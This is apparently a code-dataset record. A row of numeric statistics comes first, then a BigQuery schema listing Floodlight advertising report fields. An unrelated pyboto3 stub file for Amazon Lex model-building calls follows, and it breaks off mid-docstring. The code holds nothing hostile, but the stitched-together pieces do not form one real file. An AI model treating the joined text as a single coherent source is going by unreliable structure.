| 39.039885 | 377 | 0.606257 | 16,875 | 162,484 | 5.80877 | 0.05997 | 0.051906 | 0.077676 | 0.064087 | 0.864216 | 0.850862 | 0.826051 | 0.817584 | 0.810391 | 0.805495 | 0 | 0.000597 | 0.319619 | 162,484 | 4,161 | 378 | 39.049267 | 0.88608 | 0.052177 | 0 | 0.871116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.449942 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
###########################################################################
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
Floodlight_Report_Dimensions_Schema = [
{ "name":"Activity", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Activity_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Activity_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Activity_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Activity_Date_Time", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ad", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Ad_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Advertiser_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Asset", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Asset_Category", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Asset_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Asset_Orientation", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Audience_Targeted", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Browser_Platform", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign_End_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Campaign_Start_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Channel_Mix", "type":"STRING", "mode":"NULLABLE" },
{ "name":"City", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Click_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Click_Through_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Connection_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Conversion_Referrer", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Conversion_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Country", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Groups_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Groups_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Creative_Pixel_Size", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Creative_Version", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rich_Media_Custom_Event_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Rich_Media_Custom_Event_Path_Summary", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Days_Since_Attributed_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Days_Since_First_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Designated_Market_Area_Dma", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_1_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_2_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_3_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_4_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Field_Value_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Element_5_Value_Id", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Profile", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Dynamic_Profile_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Floodlight_Attribution_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Configuration", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_1", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_2", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_3", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_4", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_5", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_6", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_7", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_8", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_9", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_10", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_11", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_12", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_13", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_14", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_15", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_16", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_17", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_18", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_19", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_20", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_21", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_22", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_23", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_24", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_25", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_26", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_27", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_28", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_29", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_30", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_31", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_32", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_33", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_34", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_35", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_36", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_37", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_38", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_39", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_40", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_41", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_42", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_43", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_44", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_45", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_46", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_47", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_48", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_49", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_50", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_51", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_52", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_53", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_54", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_55", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_56", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_57", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_58", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_59", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_60", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_61", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_62", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_63", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_64", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_65", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_66", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_67", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_68", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_69", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_70", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_71", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_72", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_73", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_74", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_75", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_76", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_77", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_78", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_79", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_80", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_81", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_82", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_83", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_84", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_85", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_86", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_87", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_88", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_89", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_90", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_91", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_92", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_93", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_94", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_95", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_96", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_97", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_98", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_99", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Floodlight_Variable_100", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Has_Backup_Image", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Counters", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Exits", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Timers", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Dynamic_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Expansions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Video_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Video_Plays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Full_Screen_Views", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Html5_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Interactive_Impressions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Manual_Closes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Companion_Clicks", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_First_Quartile_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Full_Screen", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Interactions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Midpoints", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Mutes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Pauses", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Plays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Progress_Events", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Replays", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Skips", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Stops", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Third_Quartile_Completions", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Unmutes", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Has_Video_Views", "type":"BOOLEAN", "mode":"NULLABLE" },
{ "name":"Hour", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Hours_Since_Attributed_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Hours_Since_First_Interaction", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Impression_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Channel", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Click_Tracker", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Rich_Media", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Static_Image", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Mobile_Video", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Natural_Search", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Paid_Search", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Rich_Media", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Static_Image", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Count_Video", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Interaction_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Mobile_Carrier", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Month", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Country", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Property", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Engine_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Landing_Page", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Landing_Page_Query_String", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Processed_Landing_Page", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Processed_Landing_Page_Query_String", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Natural_Search_Query", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Num_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Operating_System", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Operating_System_Version", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Ord_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Package_Roadblock", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Package_Roadblock_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Package_Roadblock_Strategy", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Group", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Advertiser", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Advertiser_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Agency", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Agency_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Bid_Strategy", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Bid_Strategy_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Campaign", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account_Category", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Engine_Account_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Ad_Group_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Ad_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Campaign_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_External_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Keyword", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Labels", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Landing_Page_Url", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Paid_Search_Legacy_Keyword_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Paid_Search_Match_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Path_Length", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Path_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_End_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Placement_Pixel_Size", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Placement_Start_Date", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Platform_Type", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rendering_Id", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Video_Length", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Dcm", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Site_Directory", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Site_Id_Site_Directory", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Site_Id_Dcm", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Site_Keyname", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Rich_Media_Standard_Event_Count", "type":"INTEGER", "mode":"NULLABLE" },
{ "name":"Rich_Media_Standard_Event_Path_Summary", "type":"STRING", "mode":"NULLABLE" },
{ "name":"State_Region", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Tran_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"U_Value", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Week", "type":"STRING", "mode":"NULLABLE" },
{ "name":"Zip_Postal_Code", "type":"INTEGER", "mode":"NULLABLE" }
]
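The hundred `Floodlight_Variable_N` columns in the schema above differ only in their index, so a fragment like that is easier to maintain if generated rather than hand-written. A minimal sketch (the helper name and the count parameter are illustrative, not part of the schema itself):

```python
import json

def floodlight_variable_fields(count=100):
    """Build the repetitive Floodlight_Variable_1..count schema entries."""
    return [
        {"name": f"Floodlight_Variable_{i}", "type": "STRING", "mode": "NULLABLE"}
        for i in range(1, count + 1)
    ]

fields = floodlight_variable_fields()
print(len(fields))            # 100
print(json.dumps(fields[0]))  # {"name": "Floodlight_Variable_1", "type": "STRING", "mode": "NULLABLE"}
```

The generated list can be spliced into the surrounding field array before handing the full schema to BigQuery.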
# pyboto3/lexmodelbuildingservice.py (gehad-shaat/pyboto3, MIT License)
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def create_bot_version(name=None, checksum=None):
"""
Creates a new version of the bot based on the $LATEST version. If the $LATEST version of this resource hasn\'t changed since you created the last version, Amazon Lex doesn\'t create a new version. It returns the last created version.
When you create the first version of a bot, Amazon Lex sets the version to 1. Subsequent versions increment by 1. For more information, see versioning-intro .
This operation requires permission for the lex:CreateBotVersion action.
See also: AWS API Documentation
Exceptions
:example: response = client.create_bot_version(
name='string',
checksum='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot that you want to create a new version of. The name is case sensitive.\n
:type checksum: string
:param checksum: Identifies a specific revision of the $LATEST version of the bot. If you specify a checksum and the $LATEST version of the bot has a different checksum, a PreconditionFailedException exception is returned and Amazon Lex doesn\'t publish a new version. If you don\'t specify a checksum, Amazon Lex publishes the $LATEST version.
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
Response Structure
(dict) --
name (string) --
The name of the bot.
description (string) --
A description of the bot.
intents (list) --
An array of Intent objects. For more information, see PutBot .
(dict) --
Identifies the specific version of an intent.
intentName (string) --
The name of the intent.
intentVersion (string) --
The version of the intent.
clarificationPrompt (dict) --
The message that Amazon Lex uses when it doesn\'t understand the user\'s request. For more information, see PutBot .
messages (list) --
An array of objects, each of which provides a message string and its type. You can specify the message string in plain text or in Speech Synthesis Markup Language (SSML).
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
maxAttempts (integer) --
The number of times to prompt the user for information.
responseCard (string) --
A response card. Amazon Lex uses this prompt at runtime, in the PostText API response. It substitutes session attributes and slot values for placeholders in the response card. For more information, see ex-resp-card .
abortStatement (dict) --
The message that Amazon Lex uses to abort a conversation. For more information, see PutBot .
messages (list) --
A collection of message objects.
(dict) --
The message object that provides the message text and its type.
contentType (string) --
The content type of the message string.
content (string) --
The text of the message.
groupNumber (integer) --
Identifies the message group that the message belongs to. When a group is assigned to a message, Amazon Lex returns one message from each group in the response.
responseCard (string) --
At runtime, if the client is using the PostText API, Amazon Lex includes the response card in the response. It substitutes all of the session attributes and slot values for placeholders in the response card.
status (string) --
When you send a request to create or update a bot, Amazon Lex sets the status response element to BUILDING . After Amazon Lex builds the bot, it sets status to READY . If Amazon Lex can\'t build the bot, it sets status to FAILED . Amazon Lex returns the reason for the failure in the failureReason response element.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to build the bot.
lastUpdatedDate (datetime) --
The date when the $LATEST version of this bot was updated.
createdDate (datetime) --
